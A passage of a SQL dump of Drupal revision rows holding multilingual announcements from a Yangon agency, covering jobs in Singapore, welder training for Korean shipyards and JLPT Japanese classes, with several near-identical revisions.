('announcement', 0, 30, 226, 'en', 0, '<p>We urgently need the following skilled workers to work in Singapore</p><p>1. S pass (Visa) Only For Men</p><p>-Position: Project/Operations Coordinator (Degree)<br>- Must be able to speak English well.<br>-Must have good knowledge and understanding of equipment and sales/buying experience<br>- Must have admin experience<br>- By computer (Record keeping, data entry, filing etc.)<br>- BE Mechanical would be more convenient</p><p>2. Work Permit (Visa) Only For Men</p><p>-Position: Admin Support Assistant (Diploma Graduate)<br>- Must be able to speak English well<br>- Must have admin experience<br>-Must have good knowledge and understanding of equipment and sales/buying experience<br>- By computer (Record keeping, data entry, filing etc.)</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('announcement', 0, 30, 226, 'ja', 0, '<p>以下の熟練労働者をシンガポールで緊急に求めています。</p><p>&nbsp; &nbsp;Sパス（ビザ）男性のみ</p><p>&nbsp; &nbsp;職種：プロジェクト/オペレーションコーディネーター（学士号）<br>&nbsp; &nbsp;英語を流暢に話すことができることが必要です。<br>&nbsp; &nbsp;装置についての良い知識と理解、販売/購買経験が必要です。<br>&nbsp; &nbsp;管理経験が必要です。<br>&nbsp; &nbsp;コンピューターを使った業務（記録保持、データ入力、ファイリングなど）があります。<br>&nbsp; &nbsp;機械工学の学位があれば尚良いです。</p><p>&nbsp; &nbsp;ワークパーミット（ビザ）男性のみ</p><p>&nbsp; &nbsp;職種：アドミンサポートアシスタント（専門学位保持者）<br>&nbsp; &nbsp;英語を流暢に話すことができることが必要です。<br>&nbsp; &nbsp;管理経験が必要です。<br>&nbsp; &nbsp;装置についての良い知識と理解、販売/購買経験が必要です。<br>&nbsp; &nbsp;コンピューターを使った業務（記録保持、データ入力、ファイリングなど）があります。</p><p>NEW COMET TRADING AGENCY CO.,LTD （09775556677、09950947491、095015742、09965104911、<br>01-8393300、01-8393344）</p>', '', 'full_html'),
('announcement', 0, 30, 226, 'ko', 0, '<p>긴급하게 다음과 같은 숙련 노동자들이 싱가포르에서 일할 필요가 있습니다.</p><p>&nbsp; &nbsp;S 패스 (비자) 남성 전용</p><p>&nbsp; &nbsp;직책: 프로젝트/운영 조정자 (학사 학위)<br>&nbsp; &nbsp;영어를 잘 구사할 수 있어야 합니다.<br>&nbsp; &nbsp;장비 및 영업/구매 경험에 대한 좋은 지식과 이해가 필요합니다.<br>&nbsp; &nbsp;행정 업무 경험이 있어야 합니다.<br>&nbsp; &nbsp;컴퓨터 활용 (기록 보관, 자료 입력, 파일 정리 등)<br>&nbsp; &nbsp;기계공학 학사 학위가 있다면 더욱 편리합니다.</p><p>&nbsp; &nbsp;워크 퍼밋 (비자) 남성 전용</p><p>&nbsp; &nbsp;직책: 행정 지원 조수 (전문대학 졸업)<br>&nbsp; &nbsp;영어를 잘 구사할 수 있어야 합니다.<br>&nbsp; &nbsp;행정 업무 경험이 있어야 합니다.<br>&nbsp; &nbsp;장비 및 영업/구매 경험에 대한 좋은 지식과 이해가 필요합니다.<br>&nbsp; &nbsp;컴퓨터 활용 (기록 보관, 자료 입력, 파일 정리 등)</p><p>NEW COMET TRADING AGENCY CO., LTD (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('announcement', 0, 31, 257, 'en', 0, '<p>We are looking for professional Welders who wants to work at Korean Shipyards.&nbsp;<br>1. 3rd Batch of Welding Training Course(Sinmalike) will be opened on (15.8.2023) at Sinmalike Shipyard.<br>2. Korean Language course will cost 150,000 MMKyats for 2 months.&nbsp;<br>3. hose who do not know how to weld and those who have a basic level can attend the course by paying a course fee of 12,500,000. (6 week course from Monday to Friday) South Korea. If experts from the shipyard come to inspect - Interview fee; X-Ray Test fees and Test Center fees must be paid.<br>4. 3G FCAW (Backing) (subject to change) must be X - Ray passed for Welder interview.<br>5. Basic salary W 2,462,000 (approximate) The basic salary may vary from company to company.<br>&nbsp;(Note. After 3 hours of overtime per day and (22) days, the money that will be earned and other living expenses, health and income tax costs are deducted, the remaining amount will be over 500,000 Burmese money.)<br>6. You can go to Korea if only you pass the drug test. (B virus, C virus, TB, venereal disease (HIV) )<br>7. Must be between 20 and 45 years old.<br>8. Must go to Korea with E-73 visa.&nbsp;<br>9.Must work for at least 2 years.<br>10. From a Korean shipyard upon completion of training and proficiency<br>&nbsp; &nbsp; Welding professionals can enter the exam. after passing the exam<br>&nbsp; &nbsp; You will have the opportunity to go to work in Korea.<br>Contact about Korea<br>09-775556677, 09-5015742, 09-950947491, 01-8393300, 01-8393344, 01-8393393<br>(A 3-2), Chapter 201 Burmese luxury housing Mingal Taung Nyunt Township, Yangon.<br>(Please contact between 9:00 a.m. and 5:00 p.m.)</p>', '', 'restricted_html'),
('announcement', 0, 31, 258, 'en', 0, '<p>We are looking for professional Welders who wants to work at Korean Shipyards.&nbsp;<br>1. 3rd Batch of Welding Training Course(Sinmalike) will be opened on (15.8.2023) at Sinmalike Shipyard.<br>2. Korean Language course will cost 150,000 MMKyats for 2 months.&nbsp;<br>3. hose who do not know how to weld and those who have a basic level can attend the course by paying a course fee of 12,500,000. (6 week course from Monday to Friday) South Korea. If experts from the shipyard come to inspect - Interview fee; X-Ray Test fees and Test Center fees must be paid.<br>4. 3G FCAW (Backing) (subject to change) must be X - Ray passed for Welder interview.<br>5. Basic salary W 2,462,000 (approximate) The basic salary may vary from company to company.<br>&nbsp;(Note. After 3 hours of overtime per day and (22) days, the money that will be earned and other living expenses, health and income tax costs are deducted, the remaining amount will be over 500,000 Burmese money.)<br>6. You can go to Korea if only you pass the drug test. (B virus, C virus, TB, venereal disease (HIV) )<br>7. Must be between 20 and 45 years old.<br>8. Must go to Korea with E-73 visa.&nbsp;<br>9.Must work for at least 2 years.<br>10. From a Korean shipyard upon completion of training and proficiency<br>&nbsp; &nbsp; Welding professionals can enter the exam. after passing the exam<br>&nbsp; &nbsp; You will have the opportunity to go to work in Korea.<br>Contact about Korea<br>09-775556677, 09-5015742, 09-950947491, 01-8393300, 01-8393344, 01-8393393<br>(A 3-2), Chapter 201 Burmese luxury housing Mingal Taung Nyunt Township, Yangon.<br>(Please contact between 9:00 a.m. and 5:00 p.m.)</p>', '', 'restricted_html'),
('announcement', 0, 31, 259, 'en', 0, '<p>We are looking for professional Welders who wants to work at Korean Shipyards.&nbsp;<br>1. 3rd Batch of Welding Training Course(Sinmalike) will be opened on (15.8.2023) at Sinmalike Shipyard.<br>2. Korean Language course will cost 150,000 MMKyats for 2 months.&nbsp;<br>3. hose who do not know how to weld and those who have a basic level can attend the course by paying a course fee of 12,500,000. (6 week course from Monday to Friday) South Korea. If experts from the shipyard come to inspect - Interview fee; X-Ray Test fees and Test Center fees must be paid.<br>4. 3G FCAW (Backing) (subject to change) must be X - Ray passed for Welder interview.<br>5. Basic salary W 2,462,000 (approximate) The basic salary may vary from company to company.<br>&nbsp;(Note. After 3 hours of overtime per day and (22) days, the money that will be earned and other living expenses, health and income tax costs are deducted, the remaining amount will be over 500,000 Burmese money.)<br>6. You can go to Korea if only you pass the drug test. (B virus, C virus, TB, venereal disease (HIV) )<br>7. Must be between 20 and 45 years old.<br>8. Must go to Korea with E-73 visa.&nbsp;<br>9.Must work for at least 2 years.<br>10. From a Korean shipyard upon completion of training and proficiency<br>&nbsp; &nbsp; Welding professionals can enter the exam. after passing the exam<br>&nbsp; &nbsp; You will have the opportunity to go to work in Korea.</p><p><br>Contact about Korea<br>09-775556677, 09-5015742, 09-950947491, 01-8393300, 01-8393344, 01-8393393<br>(A 3-2), Chapter 201 Burmese luxury housing Mingal Taung Nyunt Township, Yangon.<br>(Please contact between 9:00 a.m. and 5:00 p.m.)</p>', '', 'full_html'),
('announcement', 0, 62, 383, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', '', 'full_html'),
('announcement', 0, 62, 392, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', '', 'full_html'),
('announcement', 0, 62, 395, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes</p>', '', 'full_html'),
('announcement', 0, 62, 395, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', '', 'full_html'),
('announcement', 0, 62, 396, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul>', '', 'full_html'),
('announcement', 0, 62, 396, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', '', 'full_html'),
('announcement', 0, 62, 397, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 397, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p>', '', 'full_html'),
('announcement', 0, 62, 398, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 398, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年1月18日</li></ul>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('announcement', 0, 62, 399, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 399, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年1月18日</li></ul>', '', 'full_html'),
('announcement', 0, 62, 400, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 400, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 401, 'en', 0, '<p>Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes. Whether you\'re a beginner or looking to refine your language finesse, our tailored courses have got you covered.</p><p>Join hands with the renowned Aye Pa Pa Tun Sensei, a distinguished PhD graduate from Niigata University in Japan. With four years of dedicated expertise, Sensei brings a wealth of knowledge and experience to your language learning journey.</p><p>What Awaits You: Comprehensive Learning, Unparalleled Growth</p><ul><li>Sharpen your listening skills&nbsp;</li><li>Master reading comprehension&nbsp;</li><li>Polish your grammar&nbsp;</li><li>Expand your vocabulary&nbsp;</li><li>Conquer complex kanji characters</li></ul><p>Partnering with New Comet Trading Agency Co., Ltd, HIT Language Center not only empowers your language journey but also offers invaluable assistance for training visas, Tokutei visas, and student visas. Upon completion of courses, you\'ll earn certificates that stand as a testament to your achievement.</p><p><strong>Dive into N4 and N3 Class Details</strong></p><p><strong>N4 Class:</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 1:30 PM - 3:30 PM</li><li>Fee: 200,000 MMK&nbsp;</li><li>Course Materials: &nbsp;Minna no Nihongo, Kanji Nihongo Challenge, Speed Master Dokkai, Speed Master Choukai, Nihongo no rokushiken JLPT Old Question</li></ul><p><strong>N3 Class:&nbsp;</strong></p><ul><li>Starting: September 18, 2023&nbsp;</li><li>Schedule: 3 days a week&nbsp;</li><li>Timing: 3:30 PM - 5:30 PM&nbsp;</li><li>Fee: 250,000 MMK</li><li>Course Materials: soumatome kanji, Shinkensen Master Dokkai, Shinkensen Master Choukai, Shinkensen Master Bunpou, N3 tango 2000, and goukaku dekiru N3 Old question</li></ul><p>Don\'t miss this golden opportunity to embrace the language of culture, business, and growth. Join the HIT Language Center family and unlock a world of possibilities. Enroll today and let language mastery open doors to your future success!</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a>&nbsp;</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('announcement', 0, 62, 401, 'ja', 0, '<p>2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。</p><p>日本の新潟大学を卒業した名だたるAye Pa Pa Tun先生と手を取り合いましょう。4年間の専門知識と経験を提供する先生が、あなたの言語学習の旅をサポートします。</p><p>あなたを待つもの：包括的な学習、比類なき成長</p><ul><li>聴解力を磨く</li><li>読解力をマスターする</li><li>文法を磨く</li><li>語彙を拡張する</li><li>複雑な漢字を克服する</li></ul><p>New Comet Trading Agency株式会社と提携し、HIT言語センターは言語学習のサポートだけでなく、トレーニングビザ、特定技能ビザ、学生ビザの貴重な支援を提供します。コース修了時には、あなたの成果を証明する証明書が授与されます。</p><p><br><strong>N4およびN3クラスの詳細を確認</strong></p><p><strong>N4クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後1時30分から午後3時30分</li><li>料金：200,000 MMK</li><li>コース教材：みんなの日本語、漢字日本語チャレンジ、スピードマスター読解、スピードマスター聴解など！</li></ul><p><strong>N3クラス：</strong></p><ul><li>開始日：2023年9月18日</li><li>スケジュール：週3回</li><li>時間：午後3時30分から午後5時30分</li><li>料金：250,000 MMK</li><li>コース教材：総まとめ漢字、新総合マスター読解、新総合マスター聴解、新総合マスター文法、N3単語2000、合格できるN3旧問題など。</li></ul><p>文化、ビジネス、成長の言葉を抱きしめるこの黄金の機会をお見逃しなく。HIT言語センターのファミリーに参加し、可能性の世界を開いてください。今すぐ登録し、言語の達成に向けた扉を開けましょう！</p><p>Phone: 01 839330, 01 8393344, 01 8393393, 09 775556677.</p><p>Viber: +959 5556677</p><p>Email: newcometagency@gmail.com</p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
